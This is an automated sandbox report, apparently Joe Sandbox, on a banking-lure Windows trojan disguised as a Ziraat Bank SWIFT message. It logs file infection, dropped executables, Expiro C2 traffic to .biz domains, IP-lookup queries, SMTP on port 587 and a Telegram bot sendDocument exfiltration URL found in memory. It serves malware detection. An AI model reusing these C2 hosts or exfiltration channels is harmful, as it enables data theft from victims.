Source:	Binary string: ALG.pdbGCTL source: svchost.exe, 00000005.00000003.1293877990.0000000008A00000.00000004.00001000.00020000.00000000.sdmp, alg.exe.5.dr
Source:	Binary string: _.pdb source: svchost.exe, 00000005.00000002.1302736160.0000000006F05000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: spadixes.exe, 00000002.00000003.1280825411.0000000004100000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000002.00000003.1280700151.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001A.00000003.1418690449.0000000004210000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001A.00000003.1423932497.0000000004070000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001D.00000003.1437240120.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001D.00000003.1437571692.0000000003970000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001F.00000003.1448879343.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001F.00000003.1448493328.0000000003B30000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000021.00000003.1461716195.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000021.00000003.1462628419.0000000003840000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: spadixes.exe, 00000002.00000003.1280825411.0000000004100000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000002.00000003.1280700151.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001A.00000003.1418690449.0000000004210000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001A.00000003.1423932497.0000000004070000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001D.00000003.1437240120.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001D.00000003.1437571692.0000000003970000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001F.00000003.1448879343.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 0000001F.00000003.1448493328.0000000003B30000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000021.00000003.1461716195.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, spadixes.exe, 00000021.00000003.1462628419.0000000003840000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdb source: svchost.exe, 00000005.00000003.1293877990.0000000008A00000.00000004.00001000.00020000.00000000.sdmp, alg.exe.5.dr

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\SysWOW64\svchost.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	System file written: C:\Windows\System32\alg.exe			Jump to behavior

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000C6CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_000C6CA9
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000C60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_000C60DD
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000C63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_000C63F9
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000CF56F FindFirstFileW,FindClose,	0_2_000CF56F
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000CF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_000CF5FA
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000D1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_000D1B2F
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000CEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_000CEB60
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000D1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_000D1C8A
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000D1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_000D1F94
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_00906CA9 GetFileAttributesW,FindFirstFileW,FindClose,	2_2_00906CA9
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_009060DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	2_2_009060DD
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_009063F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	2_2_009063F9
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_0090F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	2_2_0090F5FA
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_0090F56F FindFirstFileW,FindClose,	2_2_0090F56F
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_00911B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00911B2F
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_0090EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_0090EB60
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_00911C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00911C8A
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_00911F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_00911F94

Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\

Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Code function: 4x nop then jmp 00FD7394h	11_2_00FD718D
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Code function: 4x nop then jmp 00FD78DCh	11_2_00FD767F
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	11_2_00FD7E60
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Code function: 4x nop then jmp 02839B39h	12_2_02839888
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Code function: 4x nop then jmp 0283A262h	12_2_02839E48
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Code function: 4x nop then jmp 0283A262h	12_2_0283A18F
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Code function: 4x nop then jmp 0283A262h	12_2_02839E38
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 4x nop then jmp 0654BCBDh	20_2_0654BA40

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.7:49753 -> 54.244.188.177:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 54.244.188.177 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 18.141.10.107 80

Yara detected Generic Downloader

Source: Yara match	File source: 5.2.svchost.exe.70bfdf0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.70f8810.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.70873c0.8.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.7:49705 -> 51.195.88.199:587

Source: global traffic

HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 54.244.188.177 54.244.188.177

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.7:49745
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.7:49738
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.7:49738
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.7:49745
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49701 -> 132.226.8.169:80

Source: global traffic

TCP traffic: 192.168.2.7:49705 -> 51.195.88.199:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: POST /vnpplpufavm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 784
Source: global traffic	HTTP traffic detected: POST /kokmvod HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 784
Source: global traffic	HTTP traffic detected: POST /yqmdwhskkjhif HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 784

Source: unknown

HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.7:49704 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Code function: 0_2_000D4EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_000D4EB5

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: global traffic	DNS traffic detected: DNS query: pywolwnvd.biz
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: s82.gocheapweb.com
Source: global traffic	DNS traffic detected: DNS query: ssbzmoy.biz
Source: global traffic	DNS traffic detected: DNS query: cvgrf.biz
Source: global traffic	DNS traffic detected: DNS query: npukfztj.biz

Source: unknown

HTTP traffic detected: POST /vnpplpufavm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 784

Source: svchost.exe, svchost.exe, 00000022.00000003.1573768980.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.1575866275.00000000032BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/
Source: svchost.exe, 00000022.00000003.1482948016.00000000032B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.1575610744.0000000003280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/vnpplpufavm
Source: svchost.exe, 00000022.00000002.1575903926.00000000032DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/yqmdwhskkjhif
Source: server02.exe, 0000000C.00000002.3712810154.00000000028EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: server02.exe, 0000000C.00000002.3712810154.00000000028EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.comd
Source: server02.exe, 0000000C.00000002.3712810154.00000000028EE000.00000004.00000800.00020000.00000000.sdmp, server02.exe, 0000000C.00000002.3712810154.00000000028DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: server02.exe, 0000000C.00000002.3712810154.0000000002871000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: server02.exe, 0000000C.00000002.3712810154.00000000028EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/d
Source: svchost.exe, 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, server02.exe, 0000000C.00000000.1292636248.0000000000532000.00000002.00000001.01000000.0000000A.sdmp, svchost.exe, 00000022.00000002.1580669736.000000000734E000.00000004.00000800.00020000.00000000.sdmp, server02.exe.5.dr	String found in binary or memory: http://checkip.dyndns.org/q
Source: server02.exe, 0000000C.00000002.3712810154.00000000028EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.orgd
Source: powershell.exe, 0000000F.00000002.1374308109.000000000720C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mi
Source: svchost.exe, 00000022.00000002.1575903926.00000000032DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cvgrf.biz/
Source: powershell.exe, 0000000F.00000002.1370958443.0000000005819000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000F.00000002.1366121980.0000000004906000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: neworigin.exe, 0000000D.00000002.3735546590.00000000084B6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002661000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3735422799.000000000848C000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.000000000288C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002732000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3734725195.0000000008410000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3731779693.0000000005CE7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3732533373.0000000005D44000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3711624475.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3732308014.0000000005D1B000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3735176499.000000000845A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r11.i.lencr.org/0
Source: neworigin.exe, 0000000D.00000002.3735546590.00000000084B6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002661000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3735422799.000000000848C000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.000000000288C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002732000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3734725195.0000000008410000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3731779693.0000000005CE7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3732533373.0000000005D44000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3711624475.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3732308014.0000000005D1B000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3735176499.000000000845A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r11.o.lencr.org0#
Source: server02.exe, 0000000C.00000002.3712810154.000000000290B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: server02.exe, 0000000C.00000002.3712810154.000000000290B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.orgd
Source: neworigin.exe, 0000000D.00000002.3714279992.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.000000000288C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002986000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s82.gocheapweb.com
Source: powershell.exe, 0000000F.00000002.1366121980.0000000004906000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: server02.exe, 0000000C.00000002.3712810154.0000000002871000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1366121980.00000000047B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000F.00000002.1366121980.0000000004906000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000F.00000002.1366121980.0000000004906000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000F.00000002.1388691557.00000000081E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.c)
Source: powershell.exe, 0000000F.00000002.1388691557.000000000823F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: neworigin.exe, 0000000D.00000002.3735422799.000000000848C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.
Source: neworigin.exe, 0000000D.00000002.3735546590.00000000084B6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3711624475.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.000000000288C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3734725195.0000000008410000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3731779693.0000000005CE7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3731779693.0000000005CFE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3711624475.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3735176499.000000000845A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: neworigin.exe, 0000000D.00000002.3735546590.00000000084B6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3711624475.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3735422799.000000000848C000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.000000000288C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3734725195.0000000008410000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3731779693.0000000005CE7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3731779693.0000000005CFE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3711624475.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3735176499.000000000845A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: svchost.exe, 00000005.00000002.1302736160.0000000006F05000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000000.1294374756.00000000002F2000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://account.dyn.com/
Source: powershell.exe, 0000000F.00000002.1366121980.00000000047B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: svchost.exe, 00000005.00000002.1302736160.0000000006F05000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000000.1294374756.00000000002F2000.00000002.00000001.01000000.0000000B.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002611000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: neworigin.exe, 0000000D.00000002.3714279992.0000000002611000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: neworigin.exe, 0000000D.00000002.3714279992.0000000002611000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t
Source: svchost.exe, 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, server02.exe, 0000000C.00000000.1292636248.0000000000532000.00000002.00000001.01000000.0000000A.sdmp, svchost.exe, 00000022.00000002.1580669736.000000000734E000.00000004.00000800.00020000.00000000.sdmp, server02.exe.5.dr	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: powershell.exe, 0000000F.00000002.1370958443.0000000005819000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
